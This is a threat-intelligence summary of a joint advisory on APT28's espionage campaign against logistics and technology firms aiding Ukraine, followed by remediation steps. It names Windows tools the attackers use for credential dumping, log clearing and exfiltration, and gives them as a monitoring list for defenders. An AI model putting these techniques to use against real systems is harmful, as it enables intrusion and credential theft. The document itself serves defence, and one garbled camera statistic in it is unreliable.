Analysis Summary

A coordinated joint advisory issued on May 21, 2025, by CISA, NSA, FBI, and international partners has warned that Russian military intelligence hackers, specifically the GRU’s 85th Main Special Service Center (Unit 26165), also known as APT28 or Fancy Bear, are conducting an ongoing cyber espionage campaign. The campaign, active since 2022, primarily targets Western logistics and technology companies involved in the coordination and transportation of aid to Ukraine. The threat actors have compromised dozens of entities across 13 countries, including the U.S., Ukraine, and several European nations, impacting sectors such as defense, transportation (airports, ports, maritime, and air traffic), and IT services. The advisory underscores the sustained nature of the campaign and warns that similar tactics, techniques, and procedures (TTPs) are likely to continue.

APT28’s initial access techniques include credential guessing, brute-force attacks, spearphishing, and the exploitation of known vulnerabilities in widely used software such as Microsoft Outlook, Roundcube, and WinRAR. In a particularly alarming development, the group has also targeted IP cameras located at strategic logistical chokepoints, such as border crossings, military facilities, and railway stations. These cameras were used to monitor aid movements, with over 80% of the compromised devices. This real-time surveillance capability is aimed at intercepting aid delivery operations, further emphasizing the group’s intelligence-gathering objectives.

Once inside the networks, the attackers use native Windows utilities for a range of malicious activities. These tools include ntdsutil for extracting Active Directory credentials, wevtutil to clear event logs, vssadmin to access locked files, and schtasks to establish persistence. Other tools like wmic, net, and reg are used for reconnaissance, lateral movement, and modifying system settings. Additionally, tools like certutil, powershell, and bitsadmin are employed for payload delivery, obfuscation, and exfiltration while evading detection. This use of “living off the land” techniques enables the attackers to blend in with normal system operations and complicate detection efforts by defenders.

The joint advisory, co-signed by cybersecurity agencies from over a dozen allied nations, reflects the global concern over these activities and urges heightened defensive measures. CISA advises organizations in the logistics and technology sectors to assume they are targets, enhance threat hunting for known TTPs and indicators of compromise (IOCs), and adopt best practices like strong multi-factor authentication, network segmentation, and timely patching of software. Given the attackers’ focus on monitoring aid shipments to Ukraine and gathering detailed transport data, organizations are strongly encouraged to increase vigilance and improve the security of both IT infrastructure and operational technology.

Impact

• Sensitive Credential Theft
• Privilege Escalation
• Gain Access
• File Encryption

Indicators of Compromise

Remediation

• Block all threat indicators at your respective controls.
• Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Implement multi-factor authentication (MFA) using strong factors (not just SMS or email).
• Enforce least privilege access policies for all users and services.
• Regularly review and revoke unused accounts and permissions.
• Apply security patches and updates promptly, especially for: Microsoft Outlook, Roundcube, and WinRAR
• Monitor vendor advisories for emerging vulnerabilities.
• Segment networks to isolate critical systems from less secure environments.
• Enable logging and monitoring on all endpoints and network devices.
• Monitor logs for indicators of compromise (IOCs) and suspicious behavior.
• Deploy intrusion detection/prevention systems (IDS/IPS).
• Conduct regular threat hunting based on known APT28 TTPs.
• Monitor for the use of native Windows tools (LOLBins) such as:
• ntdsutil, wevtutil, vssadmin, schtasks, wmic, certutil, powershell, etc.
• Look for unauthorized access to IP cameras, especially at critical logistics points.
• Ensure regular, encrypted backups are created and tested.
• Educate users on phishing and social engineering tactics.
• Conduct regular security training for both technical staff and general users.
• Participate in information-sharing networks (e.g., ISACs).
• Report incidents to national cybersecurity centers (like CISA, NCSC, etc.) to contribute to broader defense.